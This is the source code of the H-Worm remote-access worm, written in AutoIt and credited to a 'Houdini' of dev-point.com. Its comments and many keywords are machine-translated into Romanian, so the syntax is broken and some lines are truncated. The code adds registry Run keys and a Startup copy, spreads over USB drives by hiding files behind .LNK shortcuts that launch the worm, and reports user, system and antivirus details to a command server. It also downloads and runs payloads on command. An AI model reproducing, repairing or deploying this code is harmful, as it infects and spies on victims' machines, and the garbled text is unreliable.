
H-Worm [AutoIt]

Cod (AutoIt):
# Cs = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
H-WORM ÎN LUME (AutoIt versiune) \
= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

CODER:
Houdini (C) - WWW.DEV-POINT.COM

Limbaj compilat:
AutoIt V 3.0

VIZITA OWR mai multe informa?ii sau Contacta?i-m? în:
SKYPE: Houdini-FX

# CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

# Include <PROCESS.AU3>
# Include <WINAPI.AU3>
# Include <FILE.AU3>
# NOTRAYICON

# CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
CONFIG WORM
# CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

LOCAL $ IP_ADDR = "127.0.0.1"
LOCAL $ port = "40055"
LOCAL $ install_dir = @ TEMPDIR


# CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
VARIABLE WORM
# CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

LOCAL $ CIMV2 = OBJGET ("WINMGMTS:!. {IMPERSONATIONLEVEL = juca rolul} \ \ \ ROOT \ CIMV2")
LOCAL $ SPLITTER = "<|>"
LOCAL $ WORM_VERSION = "H-WORM (AutoIt)"
LOCAL $ USB_SPREADING = "false"
LOCAL $ SERVER_CMD
LOCAL $ W_METUX
LOCAL $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT


# CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
COD WORM: START
# CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

DAC? NU @ COMPILATA EXIT ATUNCI
__INIT ()
While True
__USB_SPREADING ()
__STARTUP ()
$ SERVER_CMD = __ POST ("I_AM_READY")
$ SERVER_CMD = STRINGSPLIT ($ SERVER_CMD, $ separator, 1)
SELECT
CASE $ SERVER_CMD [1] = "Uninstall"
CONSOLEWRITE ($ SERVER_CMD [1] & @ CRLF)
__USB_SPREADING ($ SERVER_CMD [1])
REGDELETE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run", $ WZFNAME)
REGDELETE ("HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run", $ WZFNAME)
FILEDELETE (@ STARTUPDIR & "\" & @ SCRIPTNAME)
EXIT
CASE $ SERVER_CMD [1] = "UPDATE"
CONSOLEWRITE ("UPDATE" & $ SERVER_CMD [2] & @ CRLF)
_WINAPI_CLOSEHANDLE ($ W_METUX)
__DAWONLOAD_AND_EXEC ($ SERVER_CMD [2], TRUE, "/ UPDATE")
EXIT
CASE $ SERVER_CMD [1] = "Trimite"
CONSOLEWRITE ("TRIMITE" & $ SERVER_CMD [2] & @ CRLF)
__DAWONLOAD_AND_EXEC ($ SERVER_CMD [2])
CASE $ SERVER_CMD [1] = "EXCECUTE"
CONSOLEWRITE ("EXCECUTE" & SERVER_CMD $ [2] & @ CRLF)
__RUNA3X ($ SERVER_CMD [2])
ENDSELECT
SLEEP (5000)
Merge încet


FUNC __ init ()

_PATHSPLIT (@ SCRIPTFULLPATH, $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT)
IF STRINGUPPER (FILEGETLONGNAME (@ SCRIPTFULLPATH)) <> STRINGUPPER (FILEGETLONGNAME ($ install_dir & "\" & @ SCRIPTNAME)) ATUNCI
If ($ linie_cmd [0]> 0) ?i ($ linie_cmd [1] = "/ UPDATE") ATUNCI
DO
PANA FILECOPY (@ SCRIPTFULLPATH, $ install_dir & "\" & @ SCRIPTNAME, 1 +8) = 1
ELSE
FILECOPY (@ SCRIPTFULLPATH, $ install_dir & "\" & @ SCRIPTNAME, 1 +8)
ENDIF
ShellExecute ($ install_dir & "\" & @ SCRIPTNAME)
EXIT
ENDIF
__ONE_INSTANCE ()
__IS_USB_SPREADING ()
ENDFUNC



FUNC __ DAWONLOAD_AND_EXEC ($ file, $ RUN = TRUE, $ CMD = "")

LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT
LOCAL $ FGET_HANDEL

_PATHSPLIT ($ File, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
$ Rezultat = __ POST ("IS-TRIMITERE" & $ Splitter & $ file, "stream")
$ FGET_HANDEL = FileOpen (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & SZFNAME $ & $ SZEXT, 16 +2 +8)
FILEWRITE ($ FGET_HANDEL, $ rezultat)
FILECLOSE ($ FGET_HANDEL)
Daca $ apoi executa?i ShellExecute (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & SZFNAME $ & $ SZEXT, $ CMD)
RETURN @ SCRIPTDIR & "\" & $ WZFNAME & "\" & SZFNAME $ & $ SZEXT
ENDFUNC




FUNC __ RUNA3X ($ A3X_FILE, $ CMD = "")

LOCAL $ H_RESOURCE, $ A3X_STRUCT, $ A3X_DATA
LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT
LOCAL $ FGET_HANDEL

_PATHSPLIT ($ A3X_FILE, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
FILECOPY (@ AUTOITEXE, @ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", 1 +8)
$ A3X_DATA = __ POST ("IS-TRIMITERE" & $ Splitter & $ A3X_FILE, "stream")
$ A3X_STRUCT = DLLSTRUCTCREATE ("BYTE A3x [" & BINARYLEN ($ A3X_DATA) ?i "]")
DLLSTRUCTSETDATA ($ A3X_STRUCT, "A3x", $ A3X_DATA)

$ H_RESOURCE = DLLCALL
Daca $ H_RESOURCE [0] <> 0 atunci
DLLCALL ($ A3X_STRUCT), "DWORD", DLLSTRUCTGETSIZE ($ A3X_STRUCT))
DLLCALL ("Kernel32.dll", "bool", "EndUpdateResource", "descurca", $ H_RESOURCE [0], "bool", FALSE)
ShellExecute (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", $ CMD)
ENDIF
ENDFUNC




FUNC POST __ ($ data, $ type = "text")

LOCAL $ rezultat

HTTPSETUSERAGENT (__INFORMATIOM ())
$ Rezultat = INETREAD ("HTTP :/ /" & $ IP_ADDR & ":" & $ PORT & "/" & $ DATE, 1)
Daca $ type = "text" returna STRINGUPPER (BINARYTOSTRING ($ rezultat))
RETURN $ rezultat
ENDFUNC


FUNC STARTUP __ ()

REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run", $ WZFNAME, "REG_SZ", CHR (34) & $ install_dir & "\" & @ SCRIPTNAME & CHR (34))
REGWRITE ("HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run", $ WZFNAME, "REG_SZ", CHR (34) & $ install_dir & "\" & @ SCRIPTNAME & CHR (34))
FILECOPY (@ SCRIPTFULLPATH, @ STARTUPDIR & "\" & @ SCRIPTNAME)
ENDFUNC


FUNC __ INFORMATIOM ()

LOCAL $ inforamtion = ""

$ Inforamtion = $ inforamtion & HEX (DRIVEGETSERIAL (@ HOMEDRIVE), 8) & $ SPLITTER
$ Inforamtion = $ inforamtion & @ ComputerName & $ SPLITTER
$ Inforamtion = $ inforamtion & nume de utilizator @ & $ SPLITTER
$ Inforamtion = $ inforamtion & OPERATING_SYSTEM () __ & $ SPLITTER
$ Inforamtion = $ inforamtion & $ WORM_VERSION & $ SPLITTER
$ Inforamtion = $ inforamtion & SECURITY_CENTER () __ & $ SPLITTER
$ Inforamtion = $ inforamtion & $ USB_SPREADING & $ SPLITTER
$ Inforamtion = $ inforamtion & __ TOP_WINDOWS ()
Întoarcere $ inforamtion

ENDFUNC






FUNC __ OPERATING_SYSTEM ()

LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM")
LOCAL $ OS_CAPTION = ""

Pentru $ operare în $ OPERATINGSYSTEM
$ OS_CAPTION = $ OS.CAPTION & "."
EXITLOOP
NEXT
Întoarcere $ OS_CAPTION
ENDFUNC






FUNC __ SECURITY_CENTER ()


LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM")
LOCAL $ OS_VERSION
LOCAL $ SECURITY_CENTER = "SecurityCenter"

Pentru $ operare în $ OPERATINGSYSTEM
$ OS_VERSION = NUM?RUL ($ OS.VERSION)
NEXT
Daca $ OS_VERSION> 6 atunci $ SECURITY_CENTER = "SECURITYCENTER2"
$ OBJ_SECURITY_CENTER = OBJGET ("WINMGMTS:. \ \ \ ROOT \" & $ SECURITY_CENTER)

LOCAL $ COL_ANTI_VIRUS = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM ANTIVIRUSPRODUCT")
LOCAL $ ANTI_VIRUSE = ""
LOCAL $ COL_FIRE_WALL = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM FIREWALLPRODUCT")
LOCAL $ FIRE_WALL = ""

Pentru $ OBJ_ANTI_VIRUS în $ COL_ANTI_VIRUS
$ ANTI_VIRUSE & = $ ANTI_VIRUSE & $ OBJ_ANTI_VIRUS.DISPLAYNAME si "."
NEXT

Pentru $ OBJ_FIRE_WALL în $ COL_FIRE_WALL
$ FIRE_WALL & = $ FIRE_WALL & $ OBJ_FIRE_WALL.DISPLAYNAME si "."
NEXT

Daca $ ANTI_VIRUSE = "" atunci $ ANTI_VIRUSE = "NU AV"
Daca $ FIRE_WALL = "" atunci $ FIRE_WALL = "NO FW"

Întoarcere $ ANTI_VIRUSE & "<|>" & FIRE_WALL $
ENDFUNC





FUNC __ TOP_WINDOWS ()

LOCAL $ WINTOP_TEXT = _WINAPI_GETWINDOWTEXT (_WINAPI_GETFOREGROUNDWINDOW ())
LOCAL $ WINTOP_PID, $ WINTOP_PNAME
_WINAPI_GETWINDOWTHREADPROCESSID (_WINAPI_GETFOREGROUNDWINDOW (), $ WINTOP_PID)
$ WINTOP_PNAME = _PROCESSGETNAME ($ WINTOP_PID)

Întoarcere $ WINTOP_TEXT & "- [" & $ WINTOP_PNAME si "]"
ENDFUNC





FUNC __ ONE_INSTANCE ()

$ W_METUX = _WINAPI_CREATEMUTEX ($ WZFNAME si "_" & $ WORM_VERSION)
IF (@ EROARE) sau (_WINAPI_GETLASTERROR () = 183) apoi ie?i?i
ENDFUNC



FUNC __ USB_SPREADING ($ type = "Instalare")

$ DISK = DRIVEGETDRIVE ("Removable")
DAC? NU ISARRAY ($ disc) apoi s? se întoarc?
Pentru $ I = 1 la $ DISK [0] PASUL 1
IF DRIVESTATUS ($ DISK [$ i]) = "READY", atunci IFOLDERS __ ($ DISK [$ i] & "\", $ TIP)
NEXT

ENDFUNC



FUNC IS_USB_SPREADING __ ()

LOCAL $ W_KEY = STRINGSPLIT (@ SCRIPTNAME, ".")
$ USB_SPREADING = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "")
Daca $ USB_SPREADING = "", apoi
$ USB_SPREADING = "false"
IF STRINGUPPER (STRINGMID (@ SCRIPTFULLPATH, 2)) = STRINGUPPER (": \" & @ SCRIPTNAME) atunci $ USB_SPREADING = "true"
REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "", "REG_SZ", $ USB_SPREADING)
ENDIF
ENDFUNC



IFOLDERS __ func ($ ROOT, $ type = "Install", $ nume = TRUE, $ CALLBACK = "__CALLBACK")

LOCAL $ H_SEARCH, $ ENUM_ARRAY [1], $ FIND_NAME
LOCAL $ G_COUNTER = 0, $ L_COUNTER = 0

$ ENUM_ARRAY [0] = $ ROOT
DO
$ H_SEARCH = FILEFINDFIRSTFILE ($ ENUM_ARRAY [$ G_COUNTER] & "\ *")
DO
$ FIND_NAME = FILEFINDNEXTFILE ($ H_SEARCH)
DAC? NU @ eroare ?i $ FIND_NAME <> "", apoi
ReDim $ ENUM_ARRAY [UBound ($ ENUM_ARRAY) +1]
$ ENUM_ARRAY [UBound ($ ENUM_ARRAY) -1] = $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME
CALL ($ apel invers, $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME, $ TIP)
$ L_COUNTER + = 1
ENDIF
PÂN? @ eroare sau $ FIND_NAME = ""
FILECLOSE ($ H_SEARCH)
Dac? primele $ = TRUE ?i $ G_COUNTER = 0 atunci EXITLOOP
$ G_COUNTER + = 1
PÂN? LA $ G_COUNTER> $ L_COUNTER
Întoarcere $ ENUM_ARRAY
ENDFUNC


FUNC CALLBACK __ ($ PATH, $ TIP)

LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT, $ SZICON, $ argumente
_PATHSPLIT ($ PATH, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)

Daca $ type = "Install", apoi
IF (STRINGUPPER ($ SZEXT) = ". LNK") sau (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) apoi s? se întoarc?
FILECOPY (@ SCRIPTFULLPATH, $ SZDRIVE & $ SZDIR & @ SCRIPTNAME, TRUE)
FILESETATTRIB ($ SZDRIVE & $ SZDIR & SCRIPTNAME @, "+ HS")
$ Argumente = "/ C START" & STRINGREPLACE (@ SCRIPTNAME, "", CHRW (34) & "" & CHRW (34)) & "& Start" si STRINGREPLACE ($ SZFNAME & $ SZEXT, "", CHRW (34) & "" & CHRW (34)) & "& EXIT"
DAC? NU STRINGINSTR (FILEGETATTRIB ($ PATH), "D"), atunci
$ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ Classes \" & REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ Classes \" & $ SZEXT, "") & "\ DEFAULTICON", "")
ELSE
$ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ Classes \ de \ DEFAULTICON", "")
ENDIF
$ SZICON = STRINGSPLIT ($ SZICON, "")
If ($ SZICON [0] = 1) ?i (STRINGINSTR ($ SZICON [1], "% 1") = 0), apoi FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ argumente , "", $ SZICON [1], "", "", @ SW_HIDE)
If ($ SZICON [0] = 1) ?i (STRINGINSTR ($ SZICON [1], "% 1")> 0) ATUNCI FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ argumente , "", $ PATH, "", "", @ SW_HIDE)
If ($ SZICON [0] = 2) ATUNCI FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ argumente, "", $ SZICON [1], "", $ SZICON [2] , @ SW_HIDE)
FILESETATTRIB ($ PATH, "+ HS")
ENDIF
Daca $ type = "Uninstall" ATUNCI
IF (STRINGUPPER ($ SZEXT) = ". LNK") sau (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) ATUNCI FILEDELETE ($ PATH)
FILESETATTRIB ($ PATH, "-SA")
ENDIF

ENDFUNC


FUNC _WINAPI_CREATEMUTEX ($ SMUTEX, $ FINITIAL = 1, $ TSECURITY = 0)

LOCAL $ RET = DLLCALL ('Kernel32.dll "," PTR "," CreateMutexW "," PTR ", DLLSTRUCTGETPTR ($ TSECURITY)," INT ", $ FINITIAL," WSTR ", $ SMUTEX)
IF (@ ERORI) SAU (NU $ RET [0]) ATUNCI
RETURN SetError (1, 0, 0)
ENDIF
Întoarcere $ RET [0]
ENDFUNC
